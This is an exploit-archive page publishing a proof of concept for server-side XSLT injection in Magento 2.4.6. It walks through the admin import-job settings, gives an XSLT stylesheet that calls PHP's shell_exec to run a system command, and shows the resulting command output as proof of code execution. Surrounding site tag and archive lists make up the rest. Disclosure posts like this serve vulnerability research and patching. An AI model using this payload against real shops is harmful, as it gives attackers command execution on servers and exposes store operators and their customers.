Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
Change Mirror[11] Download[12]
# Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection
Date:** 2023-11-17
Exploit Author:** tmrswrr
Vendor Homepage:** [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
Software Link:** [Magento 2.4.6-p3](https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip)
Version:** 2.4.6
Tested on:** 2.4.6
## POC
1. Enter with admin credentials to this URL: [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`
3. Choose Import Source is File
4. Click `XSLT Configuration` and write this payload:
```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl">
<xsl:template match="/">
<xsl:value-of select="php:function('shell_exec','id')" />
</xsl:template>
</xsl:stylesheet>```
##RESULT
**<?xml version="1.0"?>
**uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)
File Tags
- ActiveX[18] (932)
- Advisory[19] (83,169)
- Arbitrary[20] (16,389)
- BBS[21] (2,859)
- Bypass[22] (1,802)
- CGI[23] (1,029)
- Code Execution[24] (7,408)
- Conference[25] (681)
- Cracker[26] (843)
- CSRF[27] (3,353)
- DoS[28] (23,952)
- Encryption[29] (2,372)
- Exploit[30] (52,237)
- File Inclusion[31] (4,233)
- File Upload[32] (977)
- Firewall[33] (822)
- Info Disclosure[34] (2,805)
- Intrusion Detection[35] (900)
- Java[36] (3,091)
- JavaScript[37] (878)
- Kernel[38] (6,819)
- Local[39] (14,562)
- Magazine[40] (586)
- Overflow[41] (12,841)
- Perl[42] (1,426)
- PHP[43] (5,162)
- Proof of Concept[44] (2,349)
- Protocol[45] (3,649)
- Python[46] (1,563)
- Remote[47] (31,005)
- Root[48] (3,602)
- Rootkit[49] (515)
- Ruby[50] (614)
- Scanner[51] (1,645)
- Security Tool[52] (7,926)
- Shell[53] (3,208)
- Shellcode[54] (1,216)
- Sniffer[55] (897)
- Spoof[56] (2,229)
- SQL Injection[57] (16,436)
- TCP[58] (2,418)
- Trojan[59] (687)
- UDP[60] (896)
- Virus[61] (667)
- Vulnerability[62] (32,058)
- Web[63] (9,781)
- Whitepaper[64] (3,756)
- x86[65] (966)
- XSS[66] (18,038)
- Other[67]
File Archives
- November 2023[68]
- October 2023[69]
- September 2023[70]
- August 2023[71]
- July 2023[72]
- June 2023[73]
- May 2023[74]
- April 2023[75]
- March 2023[76]
- February 2023[77]
- January 2023[78]
- December 2022[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,037)
- BSD[83] (375)
- CentOS[84] (57)
- Cisco[85] (1,926)
- Debian[86] (6,901)
- Fedora[87] (1,692)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,363)
- HPUX[90] (880)
- iOS[91] (363)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (47,646)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (486)
- RedHat[100] (14,505)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,082)
- UNIX[105] (9,338)
- UnixWare[106] (187)
- Windows[107] (6,605)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]